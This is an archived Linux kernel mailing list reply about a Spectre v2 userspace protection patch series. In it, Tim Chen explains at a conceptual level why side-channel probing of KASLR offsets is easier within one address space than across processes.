Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection

From: Tim Chen
Date: Fri Oct 19 2018 - 12:43:39 EST

Next message: Tony Lindgren: "Re: omap4: support for manually updated display"
Previous message: Guenter Roeck: "Re: linux-next: Tree for Oct 19"
In reply to: Peter Zijlstra: "Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection"
Next in thread: Peter Zijlstra: "Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On 10/19/2018 12:57 AM, Peter Zijlstra wrote:
> On Wed, Oct 17, 2018 at 10:59:28AM -0700, Tim Chen wrote:
>> Application to application exploit is in general difficult due to address
>> space layout randomization in applications and the need to know an
>
> Does the BTB attack on KASLR not work for userspace?
>

With KASLR, you can probe the kernel mapped and unmapped
addresses with side channels like TLB and infer the kernel mapping
offsets much more easily, as kernel is in the same address
space as the attack process. It is a lot harder to do
such probing from another process that doesn't share the
same page tables.

Tim

Next message: Tony Lindgren: "Re: omap4: support for manually updated display"
Previous message: Guenter Roeck: "Re: linux-next: Tree for Oct 19"
In reply to: Peter Zijlstra: "Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection"
Next in thread: Peter Zijlstra: "Re: [Patch v3 00/13] Provide process property based options to enable Spectre v2 userspace-userspace protection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]